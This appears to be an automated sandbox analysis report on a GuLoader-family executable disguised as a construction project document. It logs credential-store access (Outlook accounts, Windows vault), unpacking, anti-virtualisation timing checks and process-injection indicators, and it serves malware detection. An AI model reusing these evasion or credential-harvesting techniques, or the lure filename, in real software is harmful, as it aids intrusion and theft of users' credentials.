              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.cfgJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeUnpacked PE file: 5.2.Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeUnpacked PE file: 6.2.Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeUnpacked PE file: 7.2.Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Yara detected GuLoader
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7504, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.1965807835.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332C1219 push esp; iretd 4_2_332C121A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2806 push ecx; ret 4_2_332B2819
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exe
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exe
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exe
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exe
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI/Special instruction interceptor: Address: 51229FF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI/Special instruction interceptor: Address: 1DC29FF
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeRDTSC instruction interceptor: First address: 50BB60B second address: 50BB60B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ecx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FF1CD4D5384h 0x00000008 test al, bl 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c test ch, ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeRDTSC instruction interceptor: First address: 1D5B60B second address: 1D5B60B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ecx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FF1CCCAE754h 0x00000008 test al, bl 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c test ch, ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindow / User API: threadDelayed 4069Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindow / User API: threadDelayed 5395Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI coverage: 4.4 %
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8008Thread sleep count: 250 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8008Thread sleep time: -125000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep count: 4069 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep time: -12207000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep count: 5395 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep time: -16185000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_004062CF FindFirstFileW,FindClose,4_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_332B10F1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000243E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000000.00000002.1965028804.00000000007BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv4333.tmp.5.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: bhv4333.tmp.5.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI call chain: ExitProcess graph end nodegraph_0-4789
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI call chain: ExitProcess graph end nodegraph_0-4794
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI call chain: ExitProcess graph end nodegraph_6-33885
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00401E51 WaitForSingleObject,LdrInitializeThunk,WaitForSingleObject,LdrInitializeThunk,WaitForSingleObject,GetExitCodeProcess,CloseHandle,0_2_00401E51
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_332B2639
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B4AB4 mov eax, dword ptr fs:[00000030h]4_2_332B4AB4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B724E GetProcessHeap,4_2_332B724E
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_332B2B1C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_332B2639
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B60E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_332B60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
